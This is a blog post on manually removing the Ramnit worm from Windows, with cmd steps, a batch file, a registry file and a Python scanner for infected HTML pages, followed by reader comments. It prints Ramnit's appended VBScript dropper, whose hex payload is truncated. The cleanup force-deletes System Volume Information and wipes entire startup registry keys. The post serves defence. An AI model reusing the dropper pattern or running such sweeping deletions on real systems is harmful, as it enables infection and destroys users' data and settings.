
Manually Removing Ramnit

First aid for a Ramnit infection.

1. Run Process Explorer from Microsoft and suspend every svchost.exe whose process sits under explorer.exe (not the ones under services.exe), then terminate the process tree.
2. Disable System Restore for the duration of the cleanup.
3. Delete the recycler, recycled and "System Volume Information" folders. The steps are as follows
(in this example the admin account is pubercity, the root directory is C: and the data directory is D:):

- Run cmd.exe,
c:\>rd /s /q "c:\recycler" [enter]
c:\>cacls "c:\system volume information" /t /e /c /g pubercity:F [enter]
c:\>rd /s /q "c:\system volume information" [enter]
d:\>rd /s /q "recycled" [enter]

4. Create Ramnit_removal.bat and Ramnit_removal.reg and put them in the same path / folder. To create them:
Open Notepad, copy the script below and save it as Ramnit_removal.bat
@echo off
REM Remove/delete the main virus files
del /f /s /q /a "%ProgramFiles%\Microsoft\WaterMark.exe">Delete_Log.txt
del /f /s /q /a "%ProgramFiles%\Microsoft\DesktopLayer.exe">>Delete_Log.txt
del /f /s /q /a "%systemroot%\System32\dmlconf.dat">>Delete_Log.txt

REM Erase other tricky worm files, if they exist
del /f /s /q /a "%Systemroot%\dmlconf.dat">>Delete_Log.txt
del /f /s /q /a "%Systemroot%\lssas.exe">>Delete_Log.txt
del /f /s /q /a "%systemroot%\ExplorerSrv.exe">>Delete_Log.txt
del /f /s /q /a "%systemroot%\System32\rundll32Srv.exe">>Delete_Log.txt

del /f /s /q /a "%ProgramFiles%\synaptics\syntp\SynTPEnhSrv.exe">>Delete_Log.txt
del /f /s /q /a "%UserProfile%\Local Settings\Application Data\\.exe">>Delete_Log.txt

REM Prevent the virus from coming back: create read-only system folders
REM with the same names so the files cannot be written again
mkdir "%ProgramFiles%\Microsoft\WaterMark.exe"
attrib +r +s -h -a "%ProgramFiles%\Microsoft\WaterMark.exe" /s /d
mkdir "%ProgramFiles%\Microsoft\DesktopLayer.exe"
attrib +r +s -h -a "%ProgramFiles%\Microsoft\DesktopLayer.exe" /s /d
mkdir "%systemroot%\System32\dmlconf.dat"
attrib +r +s -h -a "%systemroot%\System32\dmlconf.dat" /s /d
REM Restore the registry settings (%~dp0 is the folder this script is in)
reg import "%~dp0Ramnit_removal.reg"
exit

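Open Notepad, copy the script below and save it as Ramnit_removal.reg. The entries that start with [- delete the listed key outright, so every startup entry under those keys is removed, not only Ramnit's; the entries after them recreate the keys empty and reset Userinit and the .exe/.reg/.inf file associations.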

Windows Registry Editor Version 5.00

[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="c:\\windows\\system32\\userinit.exe"
[HKEY_CLASSES_ROOT\regfile\shell\open\command]
@="regedit.exe \"%1\""
[HKEY_CLASSES_ROOT\inffile\shell\open\command]
@=hex(2):22,00,25,00,31,00,22,00,20,00,25,00,2a,00,00,00
[HKEY_CLASSES_ROOT\exefile]
@="Application"
"EditFlags"=hex:38,07,00,00
"TileInfo"="prop:FileDescription;Company;FileVersion"
"InfoTip"="prop:FileDescription;Company;FileVersion;Create;Size"
[HKEY_CLASSES_ROOT\exefile\DefaultIcon]
@="%1"
[HKEY_CLASSES_ROOT\exefile\shell]
[HKEY_CLASSES_ROOT\exefile\shell\open]
"EditFlags"=hex:00,00,00,00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
[HKEY_CLASSES_ROOT\exefile\shell\runas]
[HKEY_CLASSES_ROOT\exefile\shell\runas\command]
@="\"%1\" %*"

5. Run Ramnit_removal.bat, then finish repairing the registry with Smadav or CCleaner.
6. Restart and enter Safe Mode (press F8 during boot), then scan with an up-to-date antivirus; Kaspersky is recommended.

7. Restart and clean the htm and html files. The sign of infection is that when an htm or html file is opened in Notepad, a script like this is visible at the bottom of the file:

<SCRIPT language="VBScript"><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000 // very long here…
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->
You can clean the files manually or with software. For software, use this tool.

8. Done.
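
A scan for the appended block described in step 7, as an added example that is not part of the original post: it walks a folder, flags .htm/.html files whose VBScript block sets DropFileName and a WriteData hex string starting with 4D5A, and can cut the block out. The function names, the .infected backup suffix and the sample page are assumptions made for this example.

```python
import re
from pathlib import Path

# Any <script> element; if the closing tag is missing the block runs to end of file.
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)(?:</script\s*>|\Z)", re.I | re.S)
VBS_ATTR_RE = re.compile(r"language\s*=\s*[\"']?vbscript", re.I)
# Markers from the script in step 7: DropFileName plus a WriteData hex string
# that starts with 4D5A (the "MZ" header of a Windows executable).
NAME_RE = re.compile(r"DropFileName\s*=", re.I)
HEX_PE_RE = re.compile(r"WriteData\s*=\s*\"4D5A[0-9A-F]*", re.I)

# Constructed sample: a tiny page plus a shortened trailer (not a real payload).
CLEAN = "<html><body><p>hello</p></body></html>\n"
TRAILER = ('<SCRIPT Language=VBScript><!--\n'
           'DropFileName = "svchost.exe"\n'
           'WriteData = "4D5A9000"\n'
           '//--></SCRIPT>')

def find_dropper(html):
    """Return (start, end) of the first appended dropper block, or None."""
    for m in SCRIPT_RE.finditer(html):
        attrs, body = m.group(1), m.group(2)
        if VBS_ATTR_RE.search(attrs) and NAME_RE.search(body) and HEX_PE_RE.search(body):
            return m.span()
    return None

def strip_dropper(html):
    """Return html with every dropper block cut out; other scripts are kept."""
    while (span := find_dropper(html)) is not None:
        html = html[:span[0]] + html[span[1]:]
    return html

def scan_tree(root, fix=False):
    """List infected .htm/.html files under root; with fix=True also clean them."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in (".htm", ".html"):
            continue
        text = path.read_bytes().decode("latin-1")  # lossless byte round trip
        if find_dropper(text) is None:
            continue
        hits.append(path)
        if fix:  # keep the original under a non-HTML name, then rewrite the file
            path.with_name(path.name + ".infected").write_bytes(text.encode("latin-1"))
            path.write_bytes(strip_dropper(text).encode("latin-1"))
    return hits

if __name__ == "__main__":
    print(find_dropper(CLEAN + TRAILER), repr(strip_dropper(CLEAN + TRAILER)))
```

Run `scan_tree` without `fix` first to review the list of flagged files before rewriting anything.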

  1. 27 April 2011 at 15:07

    Just reinstall and be done with it; if something is still active, look for it in the registry

  2. wiji
    27 April 2011 at 15:07

    Your music gives me a headache, Sir…. My suggestion: better not to put music on the blog, because when the signal is weak it sounds unpleasant

    @wiji: it's clean now…. :D

    @taufik: try reinstalling, bro, on the computer that has Ramnit! Read here first, okay!

  3. 21 June 2011 at 15:07

    Thank you very much for the info, it really helped me

  4. 5 October 2011 at 15:07

    Gut marsogud, top markotop, Pak Dhe.. Even better if you scan afterwards with a really effective antivirus. Wow, the computer is squeaky clean right away!!!

    Thank you, the info is very useful

    You're welcome, bro

  5. 16 May 2013 at 15:07

    I am sure this article has touched all the internet people,
    its really really fastidious article on building up
    new web site.

  6. 8 June 2013 at 15:07

    After looking into a number of the blog posts on your web site, I honestly appreciate your technique of blogging.
    I bookmarked it to my bookmark website list and will be checking back in the near future.

    Please visit my web site as well and tell me what you think.

  7. 7 September 2014 at 15:07

    You’re actually a good webmaster. The web site loading pace is
    amazing. It kind of feels that you’re doing any
    distinctive trick. Moreover, the contents are masterwork.
    You have performed a magnificent process on this subject!

  8. 4 October 2014 at 15:07

    I’m not sure why but this blog is loading very slow for
    me. Is anyone else having this problem or is it an issue
    on my end? I’ll check back later on and see if the problem still exists.

  9. 7 October 2014 at 15:07

    Hello, Neat post. There is a problem together with your web site in web explorer, could check this?
    IE nonetheless is the market leader and a big section of people will leave out your wonderful writing due
    to this problem.
